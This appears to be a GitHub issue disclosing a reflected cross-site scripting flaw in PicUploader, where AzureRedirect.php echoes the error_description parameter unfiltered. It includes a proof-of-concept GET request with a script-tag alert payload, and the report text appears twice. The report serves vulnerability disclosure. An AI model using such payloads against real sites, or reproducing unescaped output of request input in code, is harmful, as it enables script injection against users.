Open xjzzzxx opened 3 months ago
Hello,
I would like to report for a xss vulnerability in PicUploader commit fcf82ea
The path of the vulnerability: https://github.com/xiebruce/PicUploader/blob/master/auth/AzureRedirect.php
if(isset($_GET['code'])){ // Line 21 (Check) ... }else if(isset($_GET['error']) && isset($_GET['error_description'])){ // Line 38 (Check) echo $_GET['error_description']; // Line 39 (Sink)
Sink in Line 39(echo $_GET['error_description'];).
echo $_GET['error_description'];
There is no filtering, which resulting in XSS vulnerability
GET /auth/AzureRedirect.php?error=&error_description=%3Cscript%3Ealert(%27xss%27)%3C/script%3E
Here is the version without url encoding for ease of understanding:
GET /auth/AzureRedirect.php?error=&error_description=<script>alert('xss')</script>
Hello,
I would like to report for a xss vulnerability in PicUploader commit fcf82ea
Analysis
The path of the vulnerability: https://github.com/xiebruce/PicUploader/blob/master/auth/AzureRedirect.php
Sink in Line 39(
echo $_GET['error_description'];).There is no filtering, which resulting in XSS vulnerability
Poc
GET /auth/AzureRedirect.php?error=&error_description=%3Cscript%3Ealert(%27xss%27)%3C/script%3EHere is the version without url encoding for ease of understanding:
GET /auth/AzureRedirect.php?error=&error_description=<script>alert('xss')</script>Manual verification